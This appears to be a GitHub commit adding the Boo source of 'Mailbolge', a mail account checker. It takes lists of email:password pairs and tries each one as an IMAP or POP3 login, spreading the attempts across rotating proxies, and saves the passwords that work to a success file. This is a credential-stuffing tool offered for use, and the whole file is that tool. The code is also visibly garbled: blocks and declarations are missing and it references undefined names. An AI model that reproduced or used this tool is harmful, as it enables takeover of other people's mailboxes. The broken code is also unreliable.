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Guevara-chan authored Aug 6, 2018
1 parent 9053383 commit 8292056
Showing 1 changed file with 251 additions and 0 deletions.
251 changes: 251 additions & 0 deletions
Original file line number Diff line number Diff line change
@@ -0,0 +1,251 @@
import System
import System.IO
import System.Net
import System.Threading
import System.Reflection
import System.Net.Sockets
import System.Threading.Tasks
import System.Linq.Enumerable
import System.Collections.Generic
import System.Text.RegularExpressions
import System.Runtime.CompilerServices
import MailKit.Net.Pop3 from 'lib/Mailkit'
import MailKit.Net.Imap from 'lib/Mailkit'
import MailKit.Security from 'lib/Mailkit'
import Org.Mentalis.Network.ProxySocket from "lib/ProxySocket.dll"

#.{ [Classes]
class CUI:
static final channels = {"fail": "Red", "success": "Cyan", "note": "DarkGray", "io": "Yellow",
"fault": "DarkRed", "meta": "Green"}
static final control = char('•')

def constructor():
log("""# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #
# Mailbolge mail scanner v0.02 #
# Developed in 2018 by V.A. Guevara #
# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #
""".Replace('\t', ''), "meta")

# --Methods goes here.
def log(info, channel as string):
lock Console:
for chunk in "$info".Split(control):
Console.ForegroundColor = Enum.Parse(ConsoleColor, channels[channel])
Console.ForegroundColor = ConsoleColor.Gray

def dbg(info):
Console.Title = "◢.Mailbolge$info.◣"
# -------------------- #
class DiskReport:
final pref = ""
final succfile = null
final failfile = null
final channels = {}

def constructor(title as string):
pref = IO.Path.GetFileName(title)
succfile, failfile = (File.CreateText(req("$f.txt")) for f in ('success', 'fail'))
channels = {"success": succfile, "fail": failfile}

def echo(info, channel as string):
out = channels[channel] as StreamWriter
out.WriteLine(text = "$info")
return text

def req(fname as string):
return "$pref~$fname"
# -------------------- #
class Box:
public final server = ""
public final user = ""
public final password = ""
private final cancel = CancellationTokenSource().Token
private client as duck
public proxy as Proxy
event done as EventHandler of string

# --Methods goes here.
def constructor(server_ as string, user_ as string, password_ as string):
server, user, password = server_.ToLower(), user_, password_

def connect(use_imap as bool):
# Connection preparations.
client = (ImapClient if use_imap else Pop3Client)()
port = (993 if use_imap else 995)
host = ("imap" if use_imap else "pop") + ".$(server.reroute())"
sock = proxy.socket if proxy
# Actual connection.
if sock:
sock.Connect(host, port)
client.Connect(sock, host, port, SecureSocketOptions.Auto, cancel)
else: client.Connect(host, port, SecureSocketOptions.Auto, cancel)
return client
except ex:
sock.Dispose() if sock

def probe():
service.Authenticate(email, password, cancel)
done(self, "open")
except ex:
if ex.Message.StartsWith("Please log in via your web browser"): done(self, 'auth')
else: done(self, 'fail')
return self

def probe_async():
return self

[Extension] static def reroute(server as string):
if server in [""]: return ""
return server

override def ToString():
return "$email:$password"

get: return "$user@$server"

unless client:
unless client = connect(true): client = connect(false)
return client

def destructor():
client.Dispose() if client
# -------------------- #
class Proxy:
public final ip as IPAddress
public final port = 0
public final user = ""
public final password = ""
public final type as ProxyTypes

# --Methods goes here.
def constructor(url as Uri):
ip = Dns.GetHostEntry(url.Host).AddressList[0]
port = url.Port
if url.UserInfo: user, password = url.UserInfo.Split(char(':'))
for t in (ProxyTypes.Https, ProxyTypes.Socks4, ProxyTypes.Socks5):
return if type = t and test()
type = ProxyTypes.None

def test():
return Box("", "I am", "Error", proxy: self).connect(false)

override def ToString():
return "proxy://$ip:$port"

sock = ProxySocket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
sock.ProxyEndPoint = IPEndPoint(ip, port)
sock.ProxyUser = user
sock.ProxyPass = password
sock.ProxyType = type
return sock
# -------------------- #
class Mailbolge:
final tasks = Dictionary[of Box, DateTime]()
final log = {info, channel|info = ':I am Error:'; return self}
final dbg = {info|info = ':I am Error:'; return self}
final proxlist = List[of Proxy]()
final reporter = void
final max_tension = 124
private preload = 0
private debugger as Timer

# --Methods goes here.
def constructor(ui as duck, storage as Type):
log = {info, channel|ui.log(info, channel); return self}
dbg = {info|ui.dbg(info); return self}
reporter = storage

def check(box as Box, dest as duck):
if box.proxy = proxlist.get_next(): log("Launching check through •$(box.proxy)• for •$(box)•", 'note')
else: log("Launching check for •$(box)•", 'note')
box.probe_async().done += checker(dest)
lock tasks: tasks.Add(box, DateTime.Now)

def checker(dest as duck):
return def (box as Box, result as string):
lock tasks:
return self unless tasks.Remove(box)
if result == "fail":
log("Unable to access •$(• with password •$(box.password)•", 'fail')
dest.echo(box, 'fail')
log("Password for •$(• confirmed: •$(box.password)•", 'success')
dest.echo(box, "success")

def proxy_checker(entry as string):
url = Uri((entry if entry.Contains("://") else "proxy://$entry"))
return def():
if (proxy = Proxy(url)).type:
log("├> Succesfully registered •$(url)•", 'success').proxlist.Add(proxy)
return self
except: pass
log("├* Unable to connect through •$(url)•", 'fail')

[Extension] static def to_box(entry as string):
if Regex.Matches(entry, ":").Count == 1:
box, password = entry.Split(char(':'))
if Regex.Matches(box, "@").Count == 1:
user, server = box.Split(char('@'))
return Box(server, user, password)

[Extension] static def get_next[of T](list as List[of T]):
if list.Count:
list.Add(entry = list[0])
return entry

get: return tasks.Count

proxy_tasks = List[of Task]()
progress = 0
using debugger = Timer({dbg("::$(Math.Round(preload*100.0/proxy_tasks.Count, 1))%")}, null, 0, 200):
log("┌Registering proxies from '•$(value)•':", 'io')
for entry in File.ReadLines(value):
try: proxy_tasks.Add(Task.Run(proxy_checker(entry)))
except ex: log("│Invalid URL provided: •$(entry)•", 'fault')
Task.WaitAll(proxy_tasks.ToArray(), 60 * 1000 * 20)
log("└•$(proxlist.Count)• proxies was added to list.\n", 'io')
except ex: log("└$ex", 'fault')

using debugger = Timer({dbg(" [$tension/$max_tension]")}, null, 0, 200):
log("Parsing '•$(value)•'...", 'io')
feeder = File.ReadLines(value).GetEnumerator()
dest = reporter(value)
while true:
if tension < max_tension and feeder.MoveNext():
if box = feeder.Current.to_box(): check(box, dest)
else: log("Invalid entry encountered: •$(feeder.Current)•", 'fault')
elif tension == 0: break
except ex: log(ex, 'fault')

# ==Main code==
def Main(argv as (string)):
AppDomain.CurrentDomain.AssemblyResolve += def(sender, e):
return Assembly.LoadFrom("lib/$(AssemblyName(e.Name).Name).dll")
Mailbolge(CUI(), DiskReport, proxies: "proxy.lst", feed: (argv[0] if argv.Length else 'feed.txt'))

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